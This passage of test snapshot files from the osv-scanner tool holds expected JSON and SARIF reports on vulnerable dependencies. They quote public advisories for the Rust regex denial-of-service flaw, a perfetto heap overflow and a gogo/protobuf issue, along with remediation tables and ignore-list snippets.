"1.5.1", "ecosystem": "crates.io" }, "Source": { "path": "/path/to/sub-rust-project/Cargo.lock", "type": "lockfile" } } ], "AliasedIDList": [ "CVE-2022-24713", "RUSTSEC-2022-0013", "GHSA-m5pq-gvj9-9vr8" ], "AliasedVulns": { "GHSA-m5pq-gvj9-9vr8": { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-m5pq-gvj9-9vr8/GHSA-m5pq-gvj9-9vr8.json" }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-03-08T20:00:36Z", "nvd_published_at": "2022-03-08T19:15:00Z", "severity": "HIGH" }, "details": "\u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\n[advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\nThe Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.", "id": "GHSA-m5pq-gvj9-9vr8", "modified": "2022-08-11T20:38:52Z", "published": "2022-03-08T20:00:36Z", "references": [ { "type": "WEB", "url": "https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24713" }, { "type": "WEB", "url": "https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e" }, { "type": "PACKAGE", "url": "https://github.com/rust-lang/regex/" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-08" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-14" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5113" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5118" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Rust's regex crate vulnerable to regular expression denial of service" }, "RUSTSEC-2022-0013": { "affected": [ { "database_specific": { "categories": [ "denial-of-service" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0013.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713", "GHSA-m5pq-gvj9-9vr8" ], "details": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "id": "RUSTSEC-2022-0013", "modified": "2023-06-13T13:10:24Z", "published": "2022-03-08T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/regex" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Regexes with large repetitions on empty sub-expressions take a very long time to parse" } } } } --- ================================================ FILE: internal/output/__snapshots__/sarif_internal_test.snap ================================================ [Test_createSARIFHelpText/#00 - 1] **Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/CVE-2022-24713)** (Also published as: [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8), ). ## [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013)
Details > The Rust Security Response WG was notified that the `regex` crate did not > properly limit the complexity of the regular expressions (regex) it parses. An > attacker could use this security issue to perform a denial of service, by > sending a specially crafted regex to a service accepting untrusted regexes. No > known vulnerability is present when parsing untrusted input with trusted > regexes. > > This issue has been assigned CVE-2022-24713. The severity of this vulnerability > is "high" when the `regex` crate is used to parse untrusted regexes. Other uses > of the `regex` crate are not affected by this vulnerability. > > ## Overview > > The `regex` crate features built-in mitigations to prevent denial of service > attacks caused by untrusted regexes, or untrusted input matched by trusted > regexes. Those (tunable) mitigations already provide sane defaults to prevent > attacks. This guarantee is documented and it's considered part of the crate's > API. > > Unfortunately a bug was discovered in the mitigations designed to prevent > untrusted regexes to take an arbitrary amount of time during parsing, and it's > possible to craft regexes that bypass such mitigations. This makes it possible > to perform denial of service attacks by sending specially crafted regexes to > services accepting user-controlled, untrusted regexes. > > ## Affected versions > > All versions of the `regex` crate before or equal to 1.5.4 are affected by this > issue. The fix is include starting from `regex` 1.5.5. > > ## Mitigations > > We recommend everyone accepting user-controlled regexes to upgrade immediately > to the latest version of the `regex` crate. > > Unfortunately there is no fixed set of problematic regexes, as there are > practically infinite regexes that could be crafted to exploit this > vulnerability. Because of this, we do not recommend denying known problematic > regexes. > > ## Acknowledgements > > We want to thank Addison Crump for responsibly disclosing this to us according > to the [Rust security policy][1], and for helping review the fix. > > We also want to thank Andrew Gallant for developing the fix, and Pietro Albini > for coordinating the disclosure and writing this advisory. > > [1]: https://www.rust-lang.org/policies/security
## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8)
Details > > This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well. > > [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw > > The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes. > > This issue has been assigned CVE-2022-24713. The severity of this vulnerability is "high" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability. > > ## Overview > > The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. > > Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. > > ## Affected versions > > All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5. > > ## Mitigations > > We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate. > > Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes. > > ## Acknowledgements > > We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix. > > We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.
/-/-/-/ ### Affected Packages | Source | Package Name | Package Version | | --- | --- | --- | | lockfile:/path/to/sub-rust-project/Cargo.lock | regex | 1.5.1 | ## Remediation To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. ### Fixed Versions | Vulnerability ID | Package Name | Fixed Version | | --- | --- | --- | | GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 | | RUSTSEC-2022-0013 | regex | 1.5.5 | If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an `osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency. See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ Add or append these values to the following config files to ignore this vulnerability: `/path/to/sub-rust-project/osv-scanner.toml` ``` [[IgnoredVulns]] id = "CVE-2022-24713" reason = "Your reason for ignoring this vulnerability" ``` --- [Test_createSARIFHelpText/#01 - 1] **Your dependency is vulnerable to [OSV-2023-72](https://osv.dev/OSV-2023-72)**. ## [OSV-2023-72](https://osv.dev/OSV-2023-72)
Details > OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=56057 > > ``` > Crash type: Heap-buffer-overflow WRITE 4 > Crash state: > perfetto::trace_processor::TrackEventParser::ParseTrackDescriptor > perfetto::trace_processor::TrackEventModule::ParseTracePacketData > perfetto::trace_processor::ProtoTraceParser::ParseTracePacket > ``` >
/-/-/-/ ### Affected Packages | Source | Package Name | Package Version | | --- | --- | --- | | lockfile:/Documents/Project/engine/deps_flatten.txt | https://fuchsia.googlesource.com/third_party/android.googlesource.com/platform/external/perfetto | b8da07095979310818f0efde2ef3c69ea70d62c5 | ## Remediation To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. ### Fixed Versions | Vulnerability ID | Package Name | Fixed Version | | --- | --- | --- | | OSV-2023-72 | perfetto | 9a7f09383dd39f19e662d428321ca708a2a600a3 | If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an `osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency. See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ Add or append these values to the following config files to ignore this vulnerability: `/Documents/Project/engine/osv-scanner.toml` ``` [[IgnoredVulns]] id = "OSV-2023-72" reason = "Your reason for ignoring this vulnerability" ``` --- ================================================ FILE: internal/output/__snapshots__/sarif_test.snap ================================================ [TestPrintSARIFReport/#00 - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/sub-rust-project/Cargo.lock" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/go.mod" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/sub-rust-project/Cargo.lock" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'regex@1.5.1' is vulnerable to 'CVE-2022-24713' (also known as 'RUSTSEC-2022-0013', 'GHSA-m5pq-gvj9-9vr8')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2022-24713", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/go.mod" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'github.com/gogo/protobuf@1.3.1' is vulnerable to 'CVE-2021-3121' (also known as 'GO-2021-0053', 'GHSA-c3h9-896r-86jm')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2021-3121", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/sub-rust-project/Cargo.lock" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'regex@1.5.1' is vulnerable to 'CVE-2022-24713' (also known as 'RUSTSEC-2022-0013', 'GHSA-m5pq-gvj9-9vr8')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2022-24713", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2022-24713", "RUSTSEC-2022-0013", "GHSA-m5pq-gvj9-9vr8" ], "fullDescription": { "markdown": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "text": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security" }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/CVE-2022-24713)**\n(Also published as: [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8), ).\n\n## [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e The Rust Security Response WG was notified that the `regex` crate did not\n\u003e properly limit the complexity of the regular expressions (regex) it parses. An\n\u003e attacker could use this security issue to perform a denial of service, by\n\u003e sending a specially crafted regex to a service accepting untrusted regexes. No\n\u003e known vulnerability is present when parsing untrusted input with trusted\n\u003e regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability\n\u003e is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\n\u003e of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service\n\u003e attacks caused by untrusted regexes, or untrusted input matched by trusted\n\u003e regexes. Those (tunable) mitigations already provide sane defaults to prevent\n\u003e attacks. This guarantee is documented and it's considered part of the crate's\n\u003e API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent\n\u003e untrusted regexes to take an arbitrary amount of time during parsing, and it's\n\u003e possible to craft regexes that bypass such mitigations. This makes it possible\n\u003e to perform denial of service attacks by sending specially crafted regexes to\n\u003e services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this\n\u003e issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately\n\u003e to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are\n\u003e practically infinite regexes that could be crafted to exploit this\n\u003e vulnerability. Because of this, we do not recommend denying known problematic\n\u003e regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according\n\u003e to the [Rust security policy][1], and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini\n\u003e for coordinating the disclosure and writing this advisory.\n\u003e \n\u003e [1]: https://www.rust-lang.org/policies/security\n\n\u003c/details\u003e\n\n## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\u003e \n\u003e [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\u003e \n\u003e The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/sub-rust-project/Cargo.lock | regex | 1.5.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 |\n| RUSTSEC-2022-0013 | regex | 1.5.5 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/sub-rust-project/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2022-24713\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/CVE-2022-24713)**\n(Also published as: [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8), ).\n\n## [RUSTSEC-2022-0013](https://osv.dev/RUSTSEC-2022-0013)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e The Rust Security Response WG was notified that the `regex` crate did not\n\u003e properly limit the complexity of the regular expressions (regex) it parses. An\n\u003e attacker could use this security issue to perform a denial of service, by\n\u003e sending a specially crafted regex to a service accepting untrusted regexes. No\n\u003e known vulnerability is present when parsing untrusted input with trusted\n\u003e regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability\n\u003e is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\n\u003e of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service\n\u003e attacks caused by untrusted regexes, or untrusted input matched by trusted\n\u003e regexes. Those (tunable) mitigations already provide sane defaults to prevent\n\u003e attacks. This guarantee is documented and it's considered part of the crate's\n\u003e API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent\n\u003e untrusted regexes to take an arbitrary amount of time during parsing, and it's\n\u003e possible to craft regexes that bypass such mitigations. This makes it possible\n\u003e to perform denial of service attacks by sending specially crafted regexes to\n\u003e services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this\n\u003e issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately\n\u003e to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are\n\u003e practically infinite regexes that could be crafted to exploit this\n\u003e vulnerability. Because of this, we do not recommend denying known problematic\n\u003e regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want to thank Addison Crump for responsibly disclosing this to us according\n\u003e to the [Rust security policy][1], and for helping review the fix.\n\u003e \n\u003e We also want to thank Andrew Gallant for developing the fix, and Pietro Albini\n\u003e for coordinating the disclosure and writing this advisory.\n\u003e \n\u003e [1]: https://www.rust-lang.org/policies/security\n\n\u003c/details\u003e\n\n## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/GHSA-m5pq-gvj9-9vr8)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\u003e \n\u003e [advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\u003e \n\u003e The Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\u003e \n\u003e This issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\u003e \n\u003e ## Overview\n\u003e \n\u003e The `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\u003e \n\u003e Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\u003e \n\u003e ## Affected versions\n\u003e \n\u003e All versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\u003e \n\u003e ## Mitigations\n\u003e \n\u003e We recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\u003e \n\u003e Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\u003e \n\u003e ## Acknowledgements\n\u003e \n\u003e We want 